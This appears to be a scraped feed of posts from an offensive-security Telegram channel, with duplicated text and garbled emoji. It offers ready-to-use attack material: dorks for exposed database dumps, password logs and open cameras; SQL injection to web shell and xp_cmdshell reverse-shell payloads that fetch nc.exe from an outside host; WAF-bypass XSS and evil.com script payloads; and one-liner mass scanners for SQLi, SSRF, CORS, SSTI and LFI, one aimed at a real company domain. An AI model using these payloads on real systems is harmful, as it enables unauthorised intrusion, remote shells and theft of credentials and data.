π Forgotten database dumps
Old database dumps can contain all sorts of interesting information - user credentials, configuration settings, API secrets and keys, customer data, and more.
Here is a short but effective checklist to quickly check for forgotten database dumps.
Old database dumps can contain all sorts of interesting information - user credentials, configuration settings, API secrets and keys, customer data, and more.
Here is a short but effective checklist to quickly check for forgotten database dumps.
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
/setup.sql
/sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
π4β€1
dork:
intitle:"index of" "back.sql" OR "backup.sql" OR "accounts.sql" OR "backups.sql" OR "clients.sql" OR "customers.sql" OR "data.sql" OR "database.sql" OR "database.sqlite" OR "users.sql" OR "db.sql" OR "db.sqlite" OR "db_backup.sql" OR "dbase.sql" OR "dbdump.sql" OR "setup.sql" OR "sqldump.sql" OR "dump.sql" OR "mysql.sql" OR "sql.sql" OR "temp.sql"
π4β€1
π Transition from SQL injection to shell or backdoor
β«οΈUse the βinto outfileβ command to write to a file:
β«οΈCapture the request in Burp Proxy and save it to the post-request file, then run sqlmap :
β«οΈreverse netcat shell via mssql injection when xp_cmdshell is available:
#web #sqli
β«οΈUse the βinto outfileβ command to write to a file:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
β«οΈCapture the request in Burp Proxy and save it to the post-request file, then run sqlmap :
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
β«οΈreverse netcat shell via mssql injection when xp_cmdshell is available:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#web #sqli
π₯4β€1
π¨ Getting other vulnerabilities when downloading a file
When testing file upload functionality in a web application, try setting the file name to the following values:
These payloads may introduce additional vulnerabilities.
#web
When testing file upload functionality in a web application, try setting the file name to the following values:
β«οΈ ../../../tmp/lol.png -> for Path Traversal vulnerability
β«οΈ sleep(10)-- -.jpg -> for SQL injection
β«οΈ <svg onload=alert(document.domain)>.jpg/png -> for XSS
β«οΈ ; sleep 10; -> for command injection
These payloads may introduce additional vulnerabilities.
#web
π3π3β€1
π A small selection of interesting Google dorks
β«οΈ FTP servers and sites
β«οΈLog files with passwords:
β«οΈConfiguration files with passwords:
β«οΈLists with email addresses:
β«οΈOpen cameras:
#web #google
β«οΈ FTP servers and sites
intitle:βindex ofβ inurl:ftp after:2018
β«οΈLog files with passwords:
allintext:password filetype:log after:2018
β«οΈConfiguration files with passwords:
filetype:env βDB_PASSWORDβ after:2018
β«οΈLists with email addresses:
filetype:xls inurl:βemail.xlsβ
β«οΈOpen cameras:
inurl:top.htm inurl:currenttime
#web #google
π5β€3π₯1
After exploiting sql injection using the following email address
you can't help but wonder: why the hell did this even get through as a valid email?
In general, the local part (login, before @) of an email can contain special characters according to RFC, if it is enclosed in double quotes. And then - already beloved programming languages ββdeviate a little from what characters can be used.
So, the next magic:
It will validate and legally return an email with the attack vector:
And how the developers display it further is a separate question.
#sqli
"'-sleep(5)-'"@mail.local
you can't help but wonder: why the hell did this even get through as a valid email?
In general, the local part (login, before @) of an email can contain special characters according to RFC, if it is enclosed in double quotes. And then - already beloved programming languages ββdeviate a little from what characters can be used.
So, the next magic:
php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);βIt will validate and legally return an email with the attack vector:
"'--><script/src=//evil.com></script>"@example.com
And how the developers display it further is a separate question.
#sqli
π₯5π1
β
οΈ Bypass Cloudflare WAF
Payloads working at the time of publication for performing XSS on sites protected by Cloudflare WAF.
#web #xss
Payloads working at the time of publication for performing XSS on sites protected by Cloudflare WAF.
<img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'>
<img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&quot;" src="x" alt="showme">
#web #xss
β€4
Hacking with an image. PHP payload in an image.
The php-jpeg-injector tool can be used to attack web applications that run a .jpeg image through the PHP GD graphics library.
The tool creates a new .jpeg file with a PHP payload. The infected .jpeg file is executed via PHP's gd library. PHP interprets the payload injected into the jpeg and executes it.
#web
GitHub Link
The php-jpeg-injector tool can be used to attack web applications that run a .jpeg image through the PHP GD graphics library.
The tool creates a new .jpeg file with a PHP payload. The infected .jpeg file is executed via PHP's gd library. PHP interprets the payload injected into the jpeg and executes it.
#web
GitHub Link
β€3π3
π Find SQL injection on the site with one command
As always, a set of commands is used for these purposes.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.
Anew will merge Findomain and Waybackurls output and remove duplicates.
Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
#web #sqli
As always, a set of commands is used for these purposes.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.
Anew will merge Findomain and Waybackurls output and remove duplicates.
Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent
#web #sqli
π11
β Search for SSRF on a site with one command
To accomplish this task, we will use several utilities.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Getallurls (gau) extracts known URLs from the AlienVault Open Threat Exchange, Wayback Machine, and Common Crawl.
Qsreplace takes URLs as input and replaces all query string values ββwith the value specified by the user.
After installing the above tools, simply run the following command:
Replace your.burpcollaborator.net with your server (or Burp Collaborator ) address
#web #ssrf
To accomplish this task, we will use several utilities.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Getallurls (gau) extracts known URLs from the AlienVault Open Threat Exchange, Wayback Machine, and Common Crawl.
Qsreplace takes URLs as input and replaces all query string values ββwith the value specified by the user.
After installing the above tools, simply run the following command:
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace your.burpcollaborator.net
Replace your.burpcollaborator.net with your server (or Burp Collaborator ) address
#web #ssrf
π6
π Find hidden parameters for IDOR search
When you encounter the following endpoints, try to look for hidden parameters as there is a high probability of encountering IDOR (Insecure Direct Object Reference):
To find hidden parameters you can use Arjun or fuzzparam .
https://github.com/0xsapra/fuzzparam
https://github.com/s0md3v/Arjun
Burpsuite has a param-miner extension for this purpose.
https://github.com/PortSwigger/param-miner
#web #IDOR@ExploitQuest
When you encounter the following endpoints, try to look for hidden parameters as there is a high probability of encountering IDOR (Insecure Direct Object Reference):
/settings/profile
/user/profile
/user/settings
/account/settings
/username
/profile
To find hidden parameters you can use Arjun or fuzzparam .
https://github.com/0xsapra/fuzzparam
https://github.com/s0md3v/Arjun
Burpsuite has a param-miner extension for this purpose.
https://github.com/PortSwigger/param-miner
#web #IDOR@ExploitQuest
π5
ExploitQuest
Photo
π Finding web servers vulnerable to CORS attacks
The following one-liner can determine if any subdomain of the target domain is vulnerable to cross-origin resource sharing (CORS) attacks:
For this combination to work, please install the following tools:
https://github.com/tomnomnom/assetfinder
https://github.com/projectdiscovery/httpx
https://github.com/shenwei356/rush
Here's what the team does in detail:
Collect subdomains of a target domain (e.g. fitbit.com ). Identifies real (live) subdomains and creates a list of URLs. Checks access to each URL and includes the Origin: evil.com HTTP header in each request. Looks for " evil.com " in response headers. If found, outputs the information to the terminal.
If we see something like the screenshot below, it means that the sites in question have misconfigured their CORS policy and could potentially expose sensitive information to any arbitrary third-party website. This information includes cookies, API keys, CSRF tokens, and other sensitive data.
For more information about CORS attacks, check out PortSwigger's CORS security guide :
https://portswigger.net/web-security/cors
#web #cors
The following one-liner can determine if any subdomain of the target domain is vulnerable to cross-origin resource sharing (CORS) attacks:
assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] \033[0m{}"' 2>/dev/nullFor this combination to work, please install the following tools:
https://github.com/tomnomnom/assetfinder
https://github.com/projectdiscovery/httpx
https://github.com/shenwei356/rush
Here's what the team does in detail:
Collect subdomains of a target domain (e.g. fitbit.com ). Identifies real (live) subdomains and creates a list of URLs. Checks access to each URL and includes the Origin: evil.com HTTP header in each request. Looks for " evil.com " in response headers. If found, outputs the information to the terminal.
If we see something like the screenshot below, it means that the sites in question have misconfigured their CORS policy and could potentially expose sensitive information to any arbitrary third-party website. This information includes cookies, API keys, CSRF tokens, and other sensitive data.
For more information about CORS attacks, check out PortSwigger's CORS security guide :
https://portswigger.net/web-security/cors
#web #cors
GitHub
GitHub - tomnomnom/assetfinder: Find domains and subdomains related to a given domain
Find domains and subdomains related to a given domain - tomnomnom/assetfinder
π₯°9β€5π4
π Automate the search for Server-side Template Injection (SSTI)
First, save these payloads to a file payloads.txt (you can add your own):
Then, using waybackurls we get the endpoints of our site and select the most suitable ones for SSTI using gf:
Create a list of endpoints with the payload as a parameter:
We run the command to check the server's response for the presence of SSTI:
#web #ssti
First, save these payloads to a file payloads.txt (you can add your own):
check-ssti{{7*7}}[[1*1]]
check-ssti{{7*7}}
check-ssti{{7*'7'}}
check-ssti<%= 7 * 7 %>
check-ssti${7*7}
check-ssti${{7*7}}
check-ssti@(7*7)
check-ssti#{7*7}
check-ssti#{ 7 * 7 }
Then, using waybackurls we get the endpoints of our site and select the most suitable ones for SSTI using gf:
echo target.com | waybackurls | gf ssti | anew -q ssti.txt
Create a list of endpoints with the payload as a parameter:
cat payloads.txt | while read -r line; do cat ssti.txt | qsreplace "$line" | anew -q sstipatterns.txt; done
We run the command to check the server's response for the presence of SSTI:
cat sstipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"check-ssti49\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"
#web #ssti
π₯°8π3β€2π2
π XSS in applications with automatic error correction
If you see that a web application is trying to guess or fix your search query (e.g. in the search bar) and has a WAF on top of it, use misspelled words to perform XSS and bypass the WAF:
Will be corrected to:
The above behavior is often observed in PHP web applications using pspell_suggest().
#web #xss #waf
If you see that a web application is trying to guess or fix your search query (e.g. in the search bar) and has a WAF on top of it, use misspelled words to perform XSS and bypass the WAF:
<scrpt>confrm()</scrpt>
Will be corrected to:
<script>confirm()</script>
The above behavior is often observed in PHP web applications using pspell_suggest().
#web #xss #waf
β€9π₯1
π Quick website check for simple LFI
We find the list of words to output /etc/passwd and place it in the payloads.txt file.
Then, using waybackurls we get the endpoints of our site and select the most suitable ones for LFI using gf :
Create a list of endpoints with the payload as a parameter using qsreplace :
We run the command to check the server's response for LFI:
#web #lfi
We find the list of words to output /etc/passwd and place it in the payloads.txt file.
Then, using waybackurls we get the endpoints of our site and select the most suitable ones for LFI using gf :
echo target.com | waybackurls | gf lfi | anew -q lfi.txt
Create a list of endpoints with the payload as a parameter using qsreplace :
cat payloads.txt | while read -r line; do cat lfi.txt | qsreplace "$line" | anew -q lfipatterns.txt; done
We run the command to check the server's response for LFI:
cat lfipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"root:\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"
#web #lfi
π₯21β€4π1